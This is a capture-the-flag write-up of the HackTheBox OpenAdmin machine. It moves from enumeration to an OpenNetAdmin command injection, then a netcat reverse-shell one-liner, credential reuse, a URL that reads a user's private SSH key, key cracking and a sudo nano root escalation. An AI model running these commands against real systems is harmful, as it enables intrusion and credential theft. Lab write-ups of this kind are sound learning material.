---
title: HackTheBox - OpenAdmin
created: '2021-07-19T16:50:36.306Z'
modified: '2021-07-20T19:12:54.923Z'
---

# HackTheBox - OpenAdmin

## Scanning and Enumerating the box
- Used `rustscan -a 10.10.10.171 -u 5000 -- -A -v` to scan the box
  - Port 22 : ssh : OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
  - Port 80 : http : Apache httpd 2.4.29 ((Ubuntu))
    - Looks like a default installation
- Used `gobuster dir -u http://10.10.10.171 -w SecLists/Discovery/Web-Content/common.txt`
  - Found the subdirectory: **/music**
    - Checkout in browser
      - Login link redirects to **/ona** which is **OpenNetAdmin** login page
        - Runs OpenNetAdmin v1.8.1
          - Vulnerable to [Command-Injection Attack](https://www.exploit-db.com/exploits/47691)
          - Got initial shell using it
- Found 2 users
    - jimmy (UID=1000, GID=1000)
    - joanna (UID=1001, GID=1001)

- Let's get a reverse shell
  - Search for **nc**: Turns out **netcat.openbsd**
  - Make a **reverse.sh**. Send via python HTTP server
  ```bash
  #!/bin/bash

  rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.171 1111 >/tmp/f
  ```
  - Got a reverse shell gor **www-data**

- A **LinPEAS** script was already present. Ran it
  - Saw that MySQL creds maybe avaliable in a config file **/var/www/html/ona/local/config/database_settings.inc.php**
    - Logged into **mysql** using the credentials. That didn't span out
    - Now we know that there's 2 users on the system. Let's try the passwords on them
      - Used the password to login to **jimmy** user. Password is **n1nj4W4rri0R!**
        - Not the target user. Has no user flag. Need to escalate to **joanna**

- Logged in using **jimmy**
  - Is part of group **internal**
  - During previous enumeration, found a directory **/var/www/internal** accessible only to **jimmy** and **intenal** group
    - Went to the directory, looks like a web-root.
    - Checked **/etc/apache2/site-enabled** and yes, it was a web-root for host **127.0.0.1:52846**
    - Site run as user **joanna**. Possible privesc vector
  - Reviewed the pages
    - **/cmd.php** just runs the command it recieves via **GET** paramaters.
      - Since site, runs as **joanna**, **/cmd.php?c=id** returns **joanna** ID.
      - Listed **joanna**'s home directory
        - Found user flag
        - Found her private SSH key.
        - Used **/cmd.php?c=cat%20/home/joanna/.ssh/id_rsa** to read out the entire private SSH key
- Trying to log in using **joanna** using SSH key
  - It's locked. 
    - Used `python2 /usr/bin/ssh2john joanna_key` to import as hash. Used John to crack the passcode
      - Passcode is **bloodninjas**
    - With the passcode, got as SSH shell for **joanna**
    - First tried to see what program I can run as **sudo**
      - (ALL) NOPASSWD: /bin/nano /opt/priv
      - https://gtfobins.github.io/gtfobins/nano/#sudo
      - Got root shell


